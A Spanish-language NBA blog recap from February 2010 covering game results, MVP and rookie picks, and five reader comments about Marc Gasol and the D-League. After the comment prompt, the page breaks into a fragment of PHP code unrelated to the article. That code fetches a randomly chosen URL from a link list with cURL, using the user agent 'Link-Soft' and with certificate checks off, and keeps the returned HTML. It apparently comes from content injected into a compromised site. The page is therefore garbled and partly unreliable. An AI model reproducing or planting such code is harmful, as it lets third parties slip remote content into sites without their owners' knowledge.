La Crónica (27/02/2010)

28 de February de 2010 por Viva_Dirk

La noche de ayer comenzaba con la mayor sorpresa del campeonato, y es que los Nets conseguian en el Garden de Boston su 6ª victoria en 58 partidos. No hay excusa posible para los Celtics, que no supieron defender a los Nets de otro modo que haciendo faltas, hasta 29 hicieron y llevaron 41 veces a la linea de personal a los Nets mientras que los Celtics solo la visitaron 11 veces, faltos de agresividad y piernas. Todo esto es mas grave si cabe si tenemos en cuenta el partido de Garnett, de los mejores de la temporada.

Los Bucks subieron otro peldaño hacia la post temporada ganando a los Heat que estan sin Wade y por momentos son un bodrio de equipo, ayer nos deleitaron con un 35.9% en tiros de campo. Mientras los Bulls sufrieron un tropiezo frente a los Pacers con un gran Granger. Los Warriors ganaron a los Pistons con un partidazo de A.Tolliver, cosas de Don Nelson.

Mal partido de Sergio en la derrota de NY frente a Memphis, Marc rozó el triple doble y Randolph cogio mas del doble de rebotes ofensivos que todos los Knicks juntos. Portland cumplió frente a los Wolves con el mejor partido de la carrera de Batum y 18 puntos de Rudy.

Mención especial para la paliza de Utah a los Rockets con un tremebundo partido de Deron y por fin un Okur acertado, ahora mismo son el equipo mas en forma del campeonato y si de una vez por todas todos rinden son un autentico coco.

MVP: Tres actuaciones sobresalen por encima del resto, los 31 puntos y 25 rebotes de Zach Randolph, Deron Williams con 35 puntos, 7 rebotes y 13 asistencias, y un novato en esta sección como Batum con 31 puntos, 7 rebotes y 7 asistencias. Premio para uno de nuestros favoritos, D-Will.

Rookie: Nuevamente buen partido de Taj Gibson con 14 puntos y 9 rebotes, la noticia positiva del año para Chicago. Y buena actuacion de Brandon Jennings que además tiene a su equipo en una gran dinámica, anoche 11 puntos, 5 rebotes y 8 asistencias. El premio de largo para Curry que jugó los 48 minutos frente a Detroit y ejerció de jugador franquicia con 27 puntos, 5 rebotes, 4 asistencias y 25 tiros.

Sorpresa: Jugando en los Warriors cualquier cosa puede pasar, pero ver 19 puntos, 14 rebotes y 5 asistencias de Tolliver es lo último que uno espera.

Decepción: No vamos a personificar porque Miami y Celtics en conjunto han hecho méritos mas que suficientes.

MEV: De entre los perdedores nos quedamos con el primer gran partido de Kevin Martin con Houston, 32 puntos con grandes porcentajes. Al Harrington, Rose, Al Jefferson, Prince, Garnett y Rondo también se esforzaron.

Comenta

5 comentarios a esta entrada

  1. max dice:
    #1

    Creo que Marc Gasol también se merece hoy entrar en el MVP. 25ptos(66% acierto), 13 rebotes y 8 asistencias son grandisimos números, además de que con él en pista su equipo se marcó un +22. Por otra parte,he leido que Memphis ha mandado a su número 2 del draft, H.Tabeeth, a la D-League, la cual cosa creo que demuestra un claro error de elección, habiendo como había grandes bases que buena falta le harian a los Grizzlies.

      Citar

  2. Love Denise dice:
    #2

    Vaya sorpresón el de los nets, los Celtics no contaban con Pierce, pero Garnett se ha marcado un partidazo y aun así han sido humillados en cancha propia. Parece que el fín de ciclo de este Big Three se acerca.

    56 puntos y 38 rebotes entre Marc y Zach. Vaya parejita. D’antoni ha dicho que no sabe si Marc es mejor que Pau. Yo creo que Pau es mejor y hará mejor carrera que Marc, independientemente de los títulos que logre cada uno, pero vaya bestia el Marc, al cual le ví en el Barça-memphis de hace unos 7 años, y me reía de sus grasas y de su torpeza. Nunca me esperé que llegase a estas actuaciones. Alguien sabe si el tercer Gasol es bueno al basket también?.

      Citar

  3. Dantley2 dice:
    #3

    Nunca minusvalores la capacidad de un D-Leaguer en los Warriors, se veía venir algo así de Tolliver que no es la primera vez, jeje

    Love Denise, a ver si lo buscamos por ahí con un poco de tiempo, me sonaba que medía dos metros con 14 o 15 años, pero no sé nada más. A ver si con tiempo tito google nos ayuda

      Citar

  4. Dantley2 dice:
    #4

    Bueno, el que avisa no es traidor, Reggie Williams parece que va de la D-League a los Warriors, es un jugón tremendo, quizá no para la NBA, pero este en la ACB podría hacer estragos con mando en plaza en un equipo de nivel medio-alto, como Lester Hudson, lento como el sólo, pero que a ritmo ACB daría mucho juego

      Citar

  5. pcerezo dice:
    #5

    Creo que le hermano de Gasol mide 2,04 y juega en algún college de Memphis, pero no estoy del todo seguro.
    Vaya familia con las alcachofas de Sant Boi…

    Pablo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>